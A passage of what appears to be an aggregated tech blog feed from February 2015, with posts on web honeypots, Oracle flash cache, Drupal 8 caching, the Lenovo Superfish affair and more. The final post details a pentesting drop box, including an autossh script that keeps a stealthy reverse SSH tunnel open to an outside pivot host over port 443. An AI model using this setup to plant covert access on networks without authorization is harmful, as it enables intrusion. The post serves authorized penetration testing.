A very interesting approach to a new way to test your applications! After a short break, the second speaker, Aurélien Francillon from EURECOM, presented “An analysis of exploitation behaviours on the web and the role of web hosting providers in detecting them”. To be more precise, the talk was about “web honeypots”. Today, most companies have a coporate website or web applications. Often they are hosted on a shared platform maintained by a hosting provider. How do they handle the huge amount of malicious traffic sent and received by their servers? The first part was dedicated to the description of the web honeypot built by EURECOM. The goal was to understand what were the motivations of web attackers,  what they do while and after they exploited a vulnerability on a website and to understand why attacks are carried out (for fun, profit, damage, etc). There was previous studies but they lack of such details.
Aurélien on stage

How to deploy the honeypot? Aurélien explained that 500 vulnerable websites were deployed on the Internet using 100 domains registered with five subdomains each. They were hosted on nice of the biggest hosting providers. Each websites had five common CMS with classic vulnerabilities. Once deployed, the data collection occurred for 100 days. Each website acted as a proxy and its traffic was redirected to the real web apps running on virtual machines. Why? It’s easy to reinstall, they allow full logging and it’s easy to tailor and limit the attackers privileges. About the collection data, it was impressive:

Aurélien gave some facts about the different phases of an attack:

Based on the statistics, some trends were confirmed:

The second part of the presentation focused on hosting providers. Do they complain? How do they detect malicious activity (if they detect it)? Do they care about security? Today hosting solutions are cheap, there are millions of websites maintained by inexperienced owners. This make the attack surface very large. Hosting providers should play a key role in help users. Is it the case? Hélas, according to Aurélien, no! To perform the tests, EURECOM registered multiple shared hosting accounts at multiple providers, they deployed web apps and simulated attacks:

In a first phase 1, they just observed the provider’s reaction. The second one was to take contact with it to report an abuse (one real and one illegitimate). Twelve providers were tested from the top US-based and ten from other regions (Europe, Asia, …). What were the results?
  • At registration time, some did some screening (like phone calls), some verified the provided data and only three performed a 1-click registration (no check at all).
  • Some have URL blacklisting in place.
  • Filtering occurs at OS level (ex: to prevent callbacks on suspicious ports) but the detection rate is low in general.
  • About the abuse reports: 50% never replied, amongst the others, 64% replied in one day. Wide variety of reactions
  • Some providers offers (read: sell) security add-ons. Five out of six did not detect anything. One detected but never notified the customer.
To conclude the research: most providers fail to provide correct security services, services are cheap so do not expect good services. Note that the providers names were not disclosed by Aurélien!
It was a very nice event to start the year 2015! Good topics and good speakers!

by Xavier at February 24, 2015 10:28 PM

Mattias Geniar

Firefox 36 Fully Supports HTTP/2 Standard

The post Firefox 36 Fully Supports HTTP/2 Standard appeared first on ma.ttias.be.

Now that's fast.

Support for the full HTTP/2 protocol. HTTP/2 enables a faster, more scalable, and more responsive web.

Just 2 weeks after the HTTP/2 spec was declared final, Firefox 36 ships with the updated HTTP/2 protocol. Well played, Mozilla.

The post Firefox 36 Fully Supports HTTP/2 Standard appeared first on ma.ttias.be.

by Mattias Geniar at February 24, 2015 09:28 PM

Wim Coekaerts

Oracle Linux and Database Smart Flash Cache

One, sometimes overlooked, cool feature of the Oracle Database running on Oracle Linux is called Database Smart Flash Cache.

You can find an overview of the feature in the Oracle Database Administrator's Guide. Basically, if you have flash devices attached to your server, you can use this flash memory to increase the size of the buffer cache. So instead of aging blocks out of the buffer cache and having to go back to reading them from disk, they move to the much, much faster flash storage as a secondary fast buffer cache (for reads, not writes).

Some scenarios where this is very useful : you have huge tables and huge amounts of data, a very, very large database with tons of query activity (let's say many TB) and your server is limited to a relatively small amount of main RAM - (let's say 128 or 256G). In this case, if you were to purchase and add a flash storage device of 256G or 512G (example), you can attach this device to the database with the Database Smart Flash Cache feature and increase the buffercache of your database from like 100G or 200G to 300-700G on that same server. In a good number of cases this will give you a significant performance improvement without having to purchase a new server that handles more memory or purchase flash storage that can handle your many TB of storage to live in flash instead of rotational storage.

It is also incredibly easy to configure.

-1 install Oracle Linux (I installed Oracle Linux 6 with UEK3)
-2 install Oracle Database 12c (this would also work with 11g - I installed 12.1.0.2.0 EE)
-3 add a flash device to your system (for the example I just added a 1GB device showing up as /dev/sdb)
-4 attach the storage to the database in sqlplus
Done.

$ ls /dev/sdb
/dev/sdb

$ sqlplus '/ as sysdba'

SQL*Plus: Release 12.1.0.2.0 Production on Tue Feb 24 05:46:08 2015

Copyright (c) 1982, 2014, Oracle.  All rights reserved.


Connected to:
Oracle Database 12c Enterprise Edition Release 12.1.0.2.0 - 64bit Production
With the Partitioning, OLAP, Advanced Analytics and Real Application Testing options

SQL>  alter system set db_flash_cache_file='/dev/sdb' scope=spfile;

System altered.

SQL> alter system set db_flash_cache_size=1G scope=spfile;

System altered.

SQL> shutdown immediate;
Database closed.
Database dismounted.
ORACLE instance shut down.

SQL> startup
ORACLE instance started.

Total System Global Area 4932501504 bytes
Fixed Size		    2934456 bytes
Variable Size		 1023412552 bytes
Database Buffers	 3892314112 bytes
Redo Buffers		   13840384 bytes
Database mounted.
Database opened.

SQL> show parameters flash

NAME				     TYPE	 VALUE
------------------------------------ ----------- ------------------------------
db_flash_cache_file		     string	 /dev/sdb
db_flash_cache_size		     big integer 1G
db_flashback_retention_target	     integer	 1440

SQL> select * from v$flashfilestat; 

FLASHFILE#
----------
NAME
--------------------------------------------------------------------------------
     BYTES    ENABLED SINGLEBLKRDS SINGLEBLKRDTIM_MICRO     CON_ID
---------- ---------- ------------ -------------------- ----------
	 1
/dev/sdb
1073741824	    1		 0		      0 	 0

You can get more information on configuration and guidelines/tuning here. If you want selective control of which tables can use or will use the Database Smart Flash Cache, you can use the ALTER TABLE command. See here. Specifically the STORAGE clause. By default, the tables are aged out into the flash cache but if you don't want certain tables to be cached you can use the NONE option.

alter table foo storage (flash_cache none);
This feature can really make a big difference in a number of database environments and I highly recommend taking a look at how Oracle Linux and Oracle Database 12c can help you enhance your setup. It's included with the database running on Oracle Linux.

Here is a link to a white paper that gives a bit of a performance overview.

by Wcoekaer-Oracle at February 24, 2015 08:07 PM

Dries Buytaert

5 things a government can do to grow its startup ecosystem

Building a successful company is really hard. It is hard no matter where you are in the world, but the difficulty is magnified in Europe, where people are divided by geography, regulation, language and cultural prejudice. If governments can provide European startups a competitive advantage, that could come a long way in helping to offset some of the disadvantages. In this post, I'm sharing some rough ideas for what governments could do to encourage a thriving startups ecosystem. It's my contribution to the Belgian startup manifesto (#bestartupmanifesto).

  1. Governments shouldn't obsess too much about making it easier to incorporate a company; while it is certainly nice when governments cut red tape, great entrepreneurs aren't going to be held back by some extra paperwork. Getting a company off the ground is by no means the most difficult part of the journey.
  2. Governments shouldn't decide what companies deserve funding or don't deserve funding. They will never be the best investors. Governments should play towards their strength, which is creating leverage for all instead for just a few.
  3. Governments can do quite a bit to extend a startup's runway (to compensate for the lack of funding available in Belgium). Relatively simple tax benefits result in less need for venture capital:
    • No corporate income taxes on your company for the first 3 years or until 1 million EUR in annual revenue.
    • No employee income tax or social security contributions for the first 3 years or until you hit 10 employees. Make hiring talent as cheap as possible; two employees for the price of one. (The cost of hiring an employee would effectively be the net income for the employee. The employee would still get a regular salary and social benefits.)
    • Loosen regulations on hiring and firing employees. Three months notice periods shackle the growth of startups. Governments can provide more flexibility for startups to hire and fire fast; two week notice periods for both incoming and outgoing employees. Employees who join a startup are comfortable with this level of job insecurity.
  4. Create "innovation hubs" that make neighborhoods more attractive to early-stage technology companies. Concentrate as many technology startups as possible in fun neighborhoods. Provide rent subsidies, free wifi and make sure there are great coffee shops.
  5. Build a culture of entrepreneurship. The biggest thing holding back a thriving startup community is not regulation, language, or geography, but a cultural prejudice against both failure and success. Governments can play a critical role in shaping the country's culture and creating an entrepreneurial environment where both failures and successes are celebrated, and where people are encouraged to better oneself economically through hard work and risk taking. In the end, entrepreneurship is a state of mind.

by Dries at February 24, 2015 07:15 PM

Les Jeudis du Libre

Mons, le 19 mars – SonarQube : une autre vision de votre logiciel

Logo SonarQubeCe jeudi 19 mars 2015 à 19h se déroulera la 37ième séance montoise des Jeudis du Libre de Belgique.

Le sujet de cette séance : SonarQube : une autre vision de votre logiciel

Thématique : Qualité|Développement|Outils|Visualisation

Public : Tout public

L’animateur conférencier : Dimitri Durieux (CETIC)

Lieu de cette séance : Campus technique (ISIMs) de la Haute Ecole en Hainaut, Avenue V. Maistriau, 8a, Salle Académique, 2e bâtiment (cf. ce plan sur le site de l’ISIMs, et ici sur la carte Openstreetmap).

La participation sera gratuite et ne nécessitera que votre inscription nominative, de préférence préalable, ou à l’entrée de la séance. Merci d’indiquer votre intention en vous inscrivant via la page http://jeudisdulibre.fikket.com/. La séance sera suivie d’un verre de l’amitié.

Les Jeudis du Libre à Mons bénéficient aussi du soutien de nos partenaires : CETIC, Normation, OpenSides, MeaWeb, NextLab, Phonoid et Creative Monkeys.

Si vous êtes intéressé(e) par ce cycle mensuel, n’hésitez pas à consulter l’agenda et à vous inscrire sur la liste de diffusion afin de recevoir systématiquement les annonces.

Pour rappel, les Jeudis du Libre se veulent des espaces d’échanges autour de thématiques des Logiciels Libres. Les rencontres montoises se déroulent chaque troisième jeudi du mois, et sont organisées dans des locaux et en collaboration avec des Hautes Écoles et Facultés Universitaires montoises impliquées dans les formations d’informaticiens (UMONS, HEH et Condorcet), et avec le concours de l’A.S.B.L. LoLiGrUB, active dans la promotion des logiciels libres.

Description : La qualité d’un logiciel est un sujet qui divise : certains pensent qu’il s’agit d’un surcoût et la voient comme une contrainte, d’autres au contraire pensent qu’il s’agit d’une opportunité et voient la qualité comme un guide de travail. La qualité en général c’est le fait de mettre en place les conditions (organisation, outils, règles, équipe) qui permettront de répondre aux besoins exprimés. Dans le cas d’un développement logiciel, il s’agit de développer les besoins fonctionnels et non-fonctionnels du client. Nous distinguons donc la qualité fonctionnelle (répondre aux besoins fonctionnels) et la qualité non-fonctionnelle (répondre aux besoins non-fonctionnels). On préfère donc opposer au surcoût induit par la qualité le coût induit par le manque de qualité d’un logiciel. On appelle ce manque de qualité logicielle la dette technique.

SonarQube (anciennement Sonar) est un projet open-source qui permet de suivre la qualité des développements logiciels. SonarQube est donc un projet open-source pour l’open-source. En effet, des écosystèmes open-source tels qu’OW2 et Polarsys (Eclipse) l’utilisent pour évaluer la maturité de leurs projets. Contrairement à des analyseurs classiques (par exemple : PMD ou Checkstyle), SonarQube se positionne comme un tableau de bord intégrant d’autres analyseurs et aidant à l’interprétation de leurs résultats.

SonarQube propose un ensemble de vues sur un portefeuille d’applications afin de gérer l’évolution de la dette technique de celles-ci. Pour alimenter ces vues, il s’appuie sur une architecture orientée plugins qui lui permet de supporter plus d’une vingtaine de langage du COBOL au Java en passant par le C# ou encore le PHP. L’API pour le développement de plugin est open-source. Il est donc possible d’ajouter des plugins particuliers pour supporter des nouveaux langages, avoir de nouvelles vues ou encore s’interfacer avec des outils existants.

by Didier Villers at February 24, 2015 08:16 AM

February 23, 2015

Frank Goossens

User Agent Madness

Just found this one in my http logfile;

Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

So one User Agent string mentioning 4 browsers (Mozilla, Safari, Chrome and finally Opera 27, which is the actual browser) and 3 rendering engines (Applewebkit, KHTML and Gecko)? There is a lot of web-history in those 127 characters.

by frank at February 23, 2015 06:27 AM

February 22, 2015

Dieter Adriaenssens

Buildtime Trend v0.2 released!

Visualise what's trending in your build process

Buildtime Trend Logo
What started as a few scripts to gain some insight in the duration of stages in a build process, has evolved into project Buildtime Trend, that generates and gathers timing data of build processes. The aggregated data is used to create charts to visualise trends of a build process.

The major new futures are the support for parsing Travis CI build log files to retrieve timing data and the introduction of the project as a service that gathers Travis CI generated timing data, hosts a dashboard with different charts and offers shield badges with different metrics.

Try it out!

The hosted service supports Open Source projects (public on GitHub) running their builds on Travis CI. Thanks to the kind people of Keen.io hosting the aggregated data, the hosted service is currently available for free for Open Source projects.
Get started! It's easy to set up in a few steps.

A bit more about Buildtime Trend

Dashboard example
Dashboard example
Buildtime Trend is an Open Source project that generates and gathers timing data of build processes. The aggregated data is used to create charts to visualise trends of the build process.
These trends can help you gain insight in your build process : which stages take most time? Which stages are stable or have a fluctuating duration? Is there a decrease or increase in average build duration over time?
With these insights you can improve the stability of your build process and make it more efficient.

The generation of timing data is done with either a client or using Buildtime Trend as a Service.
The Python based client generates custom timing tags for any shell based build process and can easily be integrated. A script processes the generated timing tags when the build is finished, and stores the results.
Buildtime Trend as a Service gets timing and build related data by parsing the logfiles of a buildprocess. Currently, Travis CI is supported. Simply trigger the service at the end of a Travis CI build and the parsing, aggregating and storing of the data is done automatically.

The aggregated build data is used to generate a dashboard with charts powered by the Keen.io API and data store.

Check out the website for more information about the project, follow us on Twitter, or subscribe to the community mailing list.

by Dieter Adriaenssens (noreply@blogger.com) at February 22, 2015 08:35 PM

February 20, 2015

Frank Goossens

Music from Our Tube; Ala.ni

Ala.ni appears to be

a London-based singer/songwriter, producer & video director who already worked with such artists as Mary J Blige, Damon Albarn and Andrea Bocelli

While that may sound a lot like your typical name-dropping in a press release of the next would-be-star, her music has a distinct jazzy forties-yet-modern feel to it and above all it’s really beautiful;

YouTube Video
Watch this video on YouTube or on Easy Youtube.

Ala.ni will issue an EP in March and the first song from that, Cherry Blossom, is well worth a listen too!

by frank at February 20, 2015 04:03 PM

Wouter Verhelst

LOADays 2015

Looks like I'll be speaking at LOADays again. This time around, at the suggestion of one of the organisers, I'll be speaking about the Belgian electronic ID card, for which I'm currently employed as a contractor to help maintain the end-user software. While this hasn't been officially confirmed yet, I've been hearing some positive signals from some of the organisers.

So, under the assumption that my talk will be accepted, I've started working on my slides. The intent is to explain how the eID middleware works (in general terms), how the Linux support is supposed to work, and what to do when things fail.

If my talk doesn't get rejected at the final hour, I will continue my uninterrupted "speaker at loadays" streak, which has started since loadays' first edition...

February 20, 2015 10:47 AM

February 19, 2015

Dries Buytaert

Making Drupal 8 fly

In my travels to talk about Drupal, everyone asks me about Drupal 8's performance and scalability. Modern websites are much more dynamic and interactive than 10 years ago, making it more difficult to build modern sites while also being fast. It made me realize that maybe I should write up a summary of some of the most exciting performance and scalability improvements in Drupal 8. After all, Drupal 8 will leapfrog many of its competitors in terms of how to architect and scale modern web applications. Many of these improvements benefit both small and large websites, but also allow us to build even bigger websites with Drupal.

More precise cache invalidation

One of the strategies we employ in making Drupal fast is "caching". This means we try to generate pages or page elements one time and then store them so future requests for those pages or page elements can be served faster. If an item is already cached, we can simply grab it without going through the building process again (known as a "cache hit"). Drupal stores each cache item in a "cache bin" (a database table, Memcache object, or whatever else is appropriate for the cache backend in use).

In Drupal 7 and before, when one of these cache items changes and it needs to be re-generated and re-stored (the cache gets "invalidated"), you can only delete a specific cache item, clear an entire cache bin, or use prefix-based invalidation. None of these three methods allow you to invalidate all cache items that contain data of, say, user 200. The only method that is going to suffice is clearing the entire cache bin, and this means that usually we invalidate way too much, resulting in poor cache hit ratios and wasted effort rebuilding cache items that haven't actually changed.

This problem is solved in Drupal 8 thanks to the concept of "cache tags": each cache item can have any number of cache tags. A cache tag is a compact string that describes the object being cached. Thanks to this extra metadata, we can now delete all cache items that use the user:200 cache tag, for example. This means we've deleted all the cache items we must delete, but not a single one more: optimal cache invalidation!

Drupal cache tags

Example cache tags for different cache IDs.

And don't worry, we also made sure to expose the cache tags to reverse proxies, so that efficient and accurate invalidation can happen throughout a site's entire delivery architecture.

More precise cache variation

While accurate cache invalidation makes caching more efficient, there is more we did to improve Drupal's caching. We also make sure that cached items are optimally varied. If you vary too much, duplicate cache entries will exist with the exact same content, resulting in inefficient usage of caches (low cache hit ratios). For example, we don't want a piece of content to be cached per user if it is the same for many users. If you vary too little, users might see incorrect content as two different cache entries might collide. In other words, you don't want to vary too much nor too little.

In Drupal 7 and before, it's easy to program any cached item to vary by user, by user role, and/or by page, and could even be configured through the UI for blocks. However, more targeted variations (such as by language, by country, or by content access permissions) were more difficult to program and not typically exposed in a configuration UI.

In Drupal 8, we introduced a Cache Context API to allow developers and site builders to express these variations and to make them automatically available in the configuration UI.

Drupal cache contexts

Server-side dynamic content substitution

Usually a page can be cached almost entirely except for a few dynamic elements. Often a page served to two different authenticated users looks identical except for a small "Welcome $name!" and perhaps their profile picture. In Drupal 7, this small personalization breaks the cacheability of the entire page (or rather, requires a cache context that's way too granular). Most parts of the page, like the header, the footer and certain blocks in the sidebars don't change often nor vary for each user, so why should you regenerate all those parts at every request?

In Drupal 8, thanks to the addition of #post_render_cache, that is no longer the case. Drupal 8 can render the entire page with some placeholder HTML for the name and profile picture. That page can then be cached. When Drupal has to serve that page to an authenticated user, it will retrieve it from the cache, and just before sending the HTML response to the client, it will substitute the placeholders with the dynamically rendered bits. This means we can avoid having to render the page over and over again, which is the expensive part, and only render those bits that need to be generated dynamically!

Client-side dynamic content substitution

Some things that Drupal has been rendering for the better part of a decade, such as the "new" and "updated" markers on comments, have always been rendered on the server. That is not ideal because these markers are different for every visitor and as a result, it makes caching pages with comments difficult.

The just-in-time substitution of placeholders with dynamic elements that #post_render_cache provides us can help address this. In some cases, as is the case with the comment markers, we can even do better and offload more work from the server to the client. In the case for comment markers, a certain comment is posted at a certain time — that doesn't vary per user. By embedding the comment timestamps as metadata in the DOM with a data-comment-timestamp="1424286665" attribute, we enable client-side JavaScript to render the comment markers, by fetching (and caching on the client side) the “last read" timestamp for the current user and simply comparing these numbers. Drupal 8 provides some framework code and API to make this easy.

A "Facebook BigPipe" render pipeline

With Drupal 8, we're very close to taking the client-side dynamic content substitution a step further, just like some of the world's largest dynamic websites do. Facebook has 1.35 billion monthly active users all requesting dynamic content, so why not learn from them?

The traditional page serving model has not kept up with the increase of highly personalized websites where different content is served to different users. In the traditional model, such as Drupal 7, the entire page is generated before it is sent to the browser: while Drupal is generating a page, the browser is idle and wasting its cycles doing nothing. When Drupal finishes generating the page and sends it to the browser, the browser kicks into action, and the web server is idle. In the case of Facebook, they use BigPipe. BigPipe delivers pages asynchronously instead; it parallelizes browser rendering and server processing. Instead of waiting for the entire page to be generated, BigPipe immediately sends a page skeleton to the the client so it can start rendering that. Then the remaining content elements are requested and injected into their correct place. From the user's perspective the page is rendered progressively. The initial page content becomes visible much earlier, which improves the perceived speed of the site.

We've made significant improvements to the way Drupal 8 renders pages (presentation). By default, Drupal 8 core still implements the traditional model of assembling these pieces into a complete page in a single server-side request, but the independence of each piece and the architecture of the new rendering pipeline enable different “render strategies" to be experimented with — different methods for dynamic content assembly, such as BigPipe, Edge Side Includes, or other ideas for making the most optimal use of client, server, content delivery networks and reverse proxies. In all those examples, the idea is that we can send the primary content first so the client can start rendering that. Then we send the remaining Drupal blocks, such as the navigation menu or a 'Related articles' block, and have the browser, content delivery network or reverse proxy assemble or combine these blocks into a page.

Drupal render pipeline

A snapshot of the Drupal 8 render pipeline diagram that highlights where alternative render strategies can be implemented.

Some early experiments by Wim Leers in Acquia's OCTO show that we can improve performance by a factor of about 2 compared to a recent Drupal 8 development snapshot. These breakthroughs are enabled by leveraging the various improvements we made to Drupal 8.

And much more

But that is not all. The Drupal community has actually done much more, including: complete asset dependency information (which allowed us to ensure zero JavaScript is loaded by default for anonymous users and send less data on AJAX requests), pluggable CSS/JS aggregation and minification (to support more optimal optimization algorithms), and more. We've also made sure Drupal 8 is fast by default, by having better defaults: CSS/JS aggregation enabled, JS assets being loaded from the bottom, block caching enabled, and so on.

All in all, there is a lot to look forward to in Drupal 8!

Special thanks to Acquia's Wim Leers, Alex Bronstein and Angie Byron for their contributions to this blog post.

by Dries at February 19, 2015 07:57 PM

Mattias Geniar

Tearing Down Lenovo’s Superfish Statement

The post Tearing Down Lenovo’s Superfish Statement appeared first on ma.ttias.be.

The last 48 hours have been interesting, given Lenovo has been caught installing Man-in-the-Middle root certificates on newly purchased laptops via spyware known as Superfish.

It's even more interesting now that the private key to that root certificate has been compromised. The password "komodia" tracks back to a known/commercial SSL hijacker.

It's a sign of the bad state IT security is in nowadays. Network switches and routers are intercepted on their way to ISPs to install backdoors, hard disk drives have NSA spyware in their firmware from the factories and now consumer laptops have spyware and man-in-the-middle certificates on them.

If we can't even trust the hardware we use, how are we ever going to be able to trust the software?

But what disturbs me the most in this recent Lenovo scandal, is their most recent news announcement on Superfish.

Superfish was previously included on some consumer notebook products shipped in a short window between September and December ...

This short window means the entire Q4 of 2014. So let's take the numbers published for Q4 2013 from Lenovo. The numbers may be 2 years old, but Lenovo isn't selling any less. So if Q4 2013 resulted in "$4.8 billion in sales (accounting for 51 percent of the Company’s overall sales)", how many laptops do you think those are?

An average selling price of $750 (just a wild guess, it's probably less) would result in a little over 5.630.000 laptops sold.

Diminishing the Superfish impact by saying "included on some consumer notebooks" is a smack in the face.

Superfish has completely disabled server side interactions (since January) on all Lenovo products so that the product is no longer active. This disables Superfish for all products in market.

Oh good. The threat is over.

Except it isn't. The CA certificate is still present on those laptops. The spyware itself is still installed on those machines. Guess what Lenovo, if you can disable it server-side, it can be enabled again server-side as well. You've temporarily disabled part of the problem while ignoring the bigger picture and providing a false sense of security.

Users are given a choice whether or not to use the product.

How is that even remotely true, if it's pre-installed on laptops without prior asking the user?

The relationship with Superfish is not financially significant; our goal was to enhance the experience for users. We recognize that the software did not meet that goal and have acted quickly and decisively.

The primary goal of Superfish was to show ads and inject them into various places. This is most likely the true reason of inserting their own CA certificate, to still inject ads on SSL/TLS-enabled sites.

If the primary goal of an application is to show ads, it's a financial choice. While it may not be financially significant to Lenovo, the choice to embed Superfish was made based on dollars. How much could this make us each month? What would Superfish pay Lenovo? How much money can they gain from this deal?

The only reason the relationship with Superfish existed in the first place, was a financial reason. Nothing else, Lenovo.

In this case, we have responded quickly to negative feedback, and taken decisive actions to ensure that we address these concerns.

This is where Lenovo missed the point entirely. There should never have been a reaction in the first place. They're selling laptops to consumers. That gives them 2 distinct priorities: the laptops should A) work and B) not contain any spyware. I'd love to see B) take priority over A), but for Lenovo A) will come first.

How did Superfish make it through internal reviews at Lenovo? How can any technical engineer feel OK allowing and approving this to be pre-installed on consumer laptops?

The private key for the Superfish certificate is exposed. Out of those 5.630.000 laptops sold, I'd venture a guess that 5.600.000 owners have no clue this happened and will continue to live their lives with a pre-compromised computer. Just making online payments as if nothing happened.

Good work Lenovo. Way to destroy our faith in IT security just a little more.

The post Tearing Down Lenovo’s Superfish Statement appeared first on ma.ttias.be.

by Mattias Geniar at February 19, 2015 07:10 PM

Xavier Mertens

My Little Pwnie Box

BeagleboneAs a pentester, I’m always trying to find new gadgetstools to improve my toolbox. A few weeks ago, I received my copy of Dr Philip Polstra’s book: “Hacking and Penetration Testing with Low Power Devices” (ISBN: 978-0-12-800751-8). I had a very interesting chat with Phil during the last BruCON edition and I was impressed by his “lunch box“. That’s why I decided to buy his book.

This post is not a review of Phil’s book (here is one). It’s just a wrap-up about my own “little pwnie” box setup. The book is based on the Beaglebone hardware. It’s a credit-card-sized computer that can run Linux (amongst other operating systems) and which has plenty of I/O. Much more powerful than the classic Raspberry, its size and the fact that it can be easily be powered via USB, batteries or a regular power adapter (the book has a chapter dedicated to powering the Beaglebone) makes it a very nice choice to build a pentesting device. The primary goal of such small computer is to be dropped discreetly somewhere to open a door on your target’s network. If a Beaglebone has enough power to perform basic tasks during a pentest engagement, don’t expect to run a distribution like Kali on such hardware! That’s why Phil maintains his own distribution dedicated to the Beaglebone platform: The Deck. As described on the website, add-ons are available to extend the capabilities like using 802.15.4 networking or using drones for aerial capabilities (AirDeck) like my Aircrack-One project.

I did not used Phil’s distribuiton because I like to build things by myself and to understand how it works. I setup my own Beaglebone from scratch. The base OS is a Ubuntu 14.04-LTS compiled for the ARM processor. The procedure is avaiable on ARMhf.com. Then I installed my favourite tools eg:

As Phil explains in the book, some tools are available as standard packages and a simple “apt-get install xxx” will do the job. Others must be compiled. My recommendation is to install the source code via github.com (or any other repository service) and compile it on the Beaglebone. Even if the tool is available as a package, there are always differences. Nmap is a good example: Much more NSE scripts are available in the repository. Why truecrypt? Because the Beaglebone will be dropped in an hostile environment. It’s a good idea to store all your collected data and evidences in an encrypted contained.

Aircrack-ng works perfectly with my AWUS036NH wireless card (a good old standard card for pentesters) but my primary goal is not to use my Beaglebone for wireless pentests. I’m the happy owner of a Pineapple for this purpose! My goal is to build a box that can be dropped somewhere, connected on a network and phone home. This is not covered in Phil’s book, so here are my contribution.

I’ve a Huawei 3G USB stick with a data-only card. This HSDPA modem is recognised out-of-the-box by most Linux distribution. It’s the same for the Beaglebone:

[ 16.364815] usb 2-1: new high-speed USB device number 3 using musb-hdrc
[ 16.524132] usb 2-1: device v12d1 p1001 is not supported
[ 16.529904] usb 2-1: New USB device found, idVendor=12d1, idProduct=1001
[ 16.529919] usb 2-1: New USB device strings: Mfr=2, Product=1, SerialNumber=0
[ 16.529929] usb 2-1: Product: HUAWEI Mobile
[ 16.529939] usb 2-1: Manufacturer: HUAWEI Technology

To manage dialup connection, Ubuntu has the Network-Manager but I did the choice to not install a GUI on my Beaglebone. The de-facto tool to manage dialup connection from the command line is wvdial. I remember how it was a nightmare in the ’90s to configure PPP. wvdial takes care of this for you. To test if your modem is compabitle, simple use wvdialconf:

root@beagle:/etc# wvdialconf /etc/wvdial.conf
Editing `/etc/wvdial.conf'.

Scanning your serial ports for a modem.

Modem Port Scan<*1>: S0 S1 S2 S3 
ttyUSB0<*1>: ATQ0 V1 E1 -- OK
ttyUSB0<*1>: ATQ0 V1 E1 Z -- OK
ttyUSB0<*1>: ATQ0 V1 E1 S0=0 -- OK
ttyUSB0<*1>: ATQ0 V1 E1 S0=0 &C1 -- OK
ttyUSB0<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 -- OK
ttyUSB0<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 -- OK
ttyUSB0<*1>: Modem Identifier: ATI -- Manufacturer: huawei
ttyUSB0<*1>: Speed 9600: AT -- OK
ttyUSB0<*1>: Max speed is 9600; that should be safe.
ttyUSB0<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 -- OK
ttyUSB1<*1>: ATQ0 V1 E1 -- failed with 2400 baud, next try: 9600 baud
ttyUSB1<*1>: ATQ0 V1 E1 -- failed with 9600 baud, next try: 9600 baud
ttyUSB1<*1>: ATQ0 V1 E1 -- and failed too at 115200, giving up.
ttyUSB2<*1>: ATQ0 V1 E1 -- OK
ttyUSB2<*1>: ATQ0 V1 E1 Z -- OK
ttyUSB2<*1>: ATQ0 V1 E1 S0=0 -- OK
ttyUSB2<*1>: ATQ0 V1 E1 S0=0 &C1 -- OK
ttyUSB2<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 -- OK
ttyUSB2<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 -- OK
ttyUSB2<*1>: Modem Identifier: ATI -- Manufacturer: huawei
ttyUSB2<*1>: Speed 9600: AT -- OK
ttyUSB2<*1>: Max speed is 9600; that should be safe.
ttyUSB2<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 -- OK

Found a modem on /dev/ttyUSB0.
Modem configuration written to /etc/wvdial.conf.
ttyUSB0<Info>: Speed 9600; init "ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0"
ttyUSB2<Info>: Speed 9600; init "ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0"

Then edit your configuration to match your mobile operator requirements. Mine looks like this:

[Dialer Defaults]
Init1 = ATZ
Init2 = ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
Init3 = AT+CGDCONT=1,"IP","<your_apn>"
Modem Type = Analog Modem
Baud = 115200
New PPPD = yes
Modem = /dev/ttyUSB0
ISDN = 0
Phone = *99#
Password = <your_apn_password>
Username = <your_apn_username>
Check Def Route = yes
Auto Reconnect = yes

The important information is in bold. The next step is to fire the 3G connection at boot time. It’s easy with Ubuntu, add the following lines in your /etc/network/interfaces file:

auto ppp0
iface ppp0 inet wvdial

At this point, my 3G USB modem connected but one problem remained: If the Ethernet interface was already up with a default gateway, no new default route was added via the ppp0 interface. To fix this, the following file has to be modified: /etc/ppp/peers/wvdial:

noauth
name wvdial
usepeerdns
defaultroute
replacedefaultroute

Now that the Beaglebone is connected to the world, it is not yet very useful because we don’t know how to reach it. There are chances that, using a 3G/4G network, it received a RFC198 IP address and connects to the Internet via NAT. The best way is to use SSH to connect to a host and setup a reverse shell. Another key requirement is the “persistence” (like a real malicious program). We must be sure that the SSH session will remain available all the time. To achieve this, there exist a tool called “autossh” which takes care of this. Once the standard package installed, create a configuration file /etc/init/autossh.conf:

# autossh startup Script

description "AutoSSH Daemon Startup"

start on net-device-up
stop on runlevel [01S6]

respawn
respawn limit 5 60 # respawn max 5 times in 60 seconds

script
export AUTOSSH_PIDFILE=/var/run/autossh.pid
export AUTOSSH_POLL=60
export AUTOSSH_FIRST_POLL=30
export AUTOSSH_GATETIME=0
export AUTOSSH_DEBUG=1
autossh -M 0 -4 -N -R 2222:127.0.0.1:22 -o "ServerAliveInterval 60" -o "ServerAliveCountMax 3" -o BatchMode=yes -o StrictHostKeyChe
cking=no -i /root/.ssh/id_rsa -p 443 user@pivot-host
end script

What does it do? A SSH session will be opened to the machine “pivot-host” with the login “user“. The authentication is performed with the private key stored in /root/.ssh/id_rsa (don’t forget to copy the public key on ‘pivot-host’). Change the default port (22) to something more stealthy, personally, I like to do SSH over TCP/443 which is often open to the Internet. The reverse shell is created with “-R 2222:127.0.0.1:22“. It means that a connection to port 222 on pivot-host will be forwarded to the loopback interface of the Beaglebone port 22.

Connect the 3G USB stick, boot the Beagle and a few seconds later, you’ll get a reverse shell opened on your pivot host. You are ready to connect back to the Beaglebone:

root@pivot:/tmp# netstat -anp|grep 2222
tcp 0 0 0.0.0.0:2222 0.0.0.0:* LISTEN 20549/sshd: xavier
tcp6 0 0 :::2222 :::* LISTEN 20549/sshd: xavier
root@pivot:/tmp# ssh -p 2222 user@127.0.0.1
user@127.0.0.1's password: 
Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.14.4.1-bone-armhf.com armv7l)

* Documentation: https://help.ubuntu.com/
